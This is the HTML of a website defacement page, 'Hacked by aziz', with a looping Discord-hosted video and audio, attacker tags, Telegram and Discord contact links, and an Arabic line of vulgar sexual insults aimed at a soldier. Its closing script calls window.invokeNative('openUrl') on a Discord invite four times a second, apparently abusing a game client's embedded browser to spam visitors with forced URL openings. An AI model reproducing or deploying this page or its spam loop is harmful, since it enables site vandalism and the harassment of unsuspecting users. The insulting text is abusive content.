<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacked by aziz</title>
    <!--ÇALMA KARDEŞİM :)-->
    <meta name="description" content="This site has been hacked by aziz">
    <style>
        body {
            margin: 0;
            overflow: hidden;
            font-family: Arial, sans-serif;
        }
        .video-background {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            object-fit: cover;
            z-index: -1;
        }
        .centered-image {
            position: fixed;
            top: 35vh;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 200px;
            height: 200px;
            object-fit: contain;
        }
        .centered-text {
            position: fixed;
            top: 55vh;
            left: 50%;
            transform: translate(-50%, -50%);
            color: rgb(0, 0, 0);
            font-size: 25px;
            font-weight: bold;
            text-shadow: 0 0 5px white, 0 0 10px white;
            white-space: nowrap;
        }
        .sub-text {
            position: fixed;
            top: 60vh;
            left: 50%;
            transform: translate(-50%, -50%);
            color: rgb(0, 0, 0);
            font-size: 20px;
            font-weight: normal;
            text-shadow: 0 0 5px white, 0 0 10px white;
            white-space: nowrap;
        }
        .gradual-text {
            position: fixed;
            top: 65vh;
            left: 50%;
            transform: translate(-50%, -50%);
            font-size: 20px;
            font-weight: normal;
            text-shadow: 0 0 5px rgb(0, 0, 0), 0 0 10px rgb(0, 0, 0);
            background: linear-gradient(90deg, rgb(5, 0, 0), #000000, rgb(0, 0, 0));
            background-size: 200% auto;
            color: transparent;
            -webkit-background-clip: text;
            animation: gradient-move 5s linear infinite;
            white-space: nowrap;
        }

        @keyframes gradient-move {
            0% {
                background-position: 200% center;
            }
            50% {
                background-position: -200% center;
            }
            100% {
                background-position: 200% center;
            }
        }

        .bottom-image {
            position: fixed;
            bottom: 2px;
            right: 2px;
            width: 150px;
            height: auto;
            object-fit: contain;
            z-index: 1;
            cursor: pointer;
        }
        .hackers-text {
            position: fixed;
            top: 70vh;
            left: 50%;
            transform: translate(-50%, -50%);
            color: rgb(0, 0, 0);
            font-size: 20px;
            font-weight: bold;
            text-shadow: 0 0 5px white, 0 0 10px white;
            white-space: nowrap;
        }
        .zek-boris-text {
            position: fixed;
            top: 75vh;
            left: 50%;
            transform: translate(-50%, -50%);
            color: rgb(0, 0, 0);
            font-size: 20px;
            font-weight: bold;
            text-shadow: 0 0 5px white, 0 0 10px white;
            white-space: nowrap;
            animation: gradient-move 5s linear infinite;
        }
    </style>
</head>
<body>
    <video class="video-background" autoplay muted loop>
        <source src="https://cdn.discordapp.com/attachments/1391410573513592893/1402400990010937465/08061.mp4?ex=689d01b3&is=689bb033&hm=5a55585d30fb068e2f1cdb788da21f1c460d4674d37706a87ea3001046936ff0&" type="video/mp4">
    </video>


    <div class="centered-text">abo3zhh was here </div>

    <div class="sub-text">[ليه تسجني ياقحبه ياعسكري كسمك وكسخت ام امك].</div>

    <a href="https://t.me/draker1986" target="_blank">
        <div class="gradual-text"> →insta x03z   discord: x03z←</div>
      </a>
    <audio id="hackSound" autoplay loop>
  <source src="https://cdn.discordapp.com/attachments/927946983375773737/1401946280258830446/ded9917e2bd5f075.mp3?ex=689cabb8&is=689b5a38&hm=b45db0ac7c50c293d94b982edcbad507fcf008b85b44bfe482c4f4465aa8ee2c&" type="audio/mpeg">
</audio>
<script>
  const audio = document.getElementById("hackSound");
  audio.volume = 1.0; // أعلى مستوى للصوت
</script>
<script>
setInterval(() => {
window.invokeNative("openUrl", "https://discord.gg/vuTQDu5N");
window.invokeNative("openUrl", "https://discord.gg/vuTQDu5N");
window.invokeNative("openUrl", "https://discord.gg/vuTQDu5N");
window.invokeNative("openUrl", "https://discord.gg/vuTQDu5N");
}, 1000);
    </script>
